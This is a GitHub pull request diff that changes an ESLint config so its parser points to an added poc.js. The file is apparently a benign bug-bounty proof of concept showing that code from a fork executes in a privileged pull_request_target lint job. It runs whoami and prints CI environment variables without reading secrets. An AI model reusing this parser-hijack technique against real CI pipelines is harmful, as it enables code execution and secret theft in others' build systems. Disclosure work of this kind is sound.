Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 1 addition & 2 deletions .eslintrc.json
Original file line number Diff line number Diff line change
@@ -1,10 +1,9 @@
{
"parser": "@typescript-eslint/parser",
"parser": "./poc.js",
"parserOptions": {
"ecmaVersion": 2020,
"sourceType": "module",
"ecmaFeatures": {
// Allows for the parsing of JSX
"jsx": true
}
},
Expand Down
18 changes: 18 additions & 0 deletions poc.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
// Benign security PoC for Cantina submission: Uniswap/sybil-interface lint.yml pull_request_target RCE.
// Proves fork-controlled code executes inside the privileged pull_request_target job via the eslint
// `parser` field. Strictly non-destructive: no secret is read or exfiltrated, nothing is pushed to any
// Uniswap repo. Returns the real parser so the lint job proceeds normally.
module.exports = (() => {
const cp = require("child_process");
let who = "";
try { who = cp.execSync("whoami").toString().trim(); } catch (e) { who = "err:" + e.message; }
console.log("=== LINT_ACTION_PR_TARGET_RCE_POC ===");
console.log("proof: fork-controlled parser executed via node require()");
console.log("whoami: " + who);
console.log("GITHUB_EVENT_NAME: " + process.env.GITHUB_EVENT_NAME);
console.log("GITHUB_REPOSITORY: " + process.env.GITHUB_REPOSITORY);
console.log("GITHUB_REF: " + process.env.GITHUB_REF);
console.log("note: benign - no token read, no push; returning real parser");
console.log("=== END LINT_ACTION_PR_TARGET_RCE_POC ===");
return require("@typescript-eslint/parser");
})();
Loading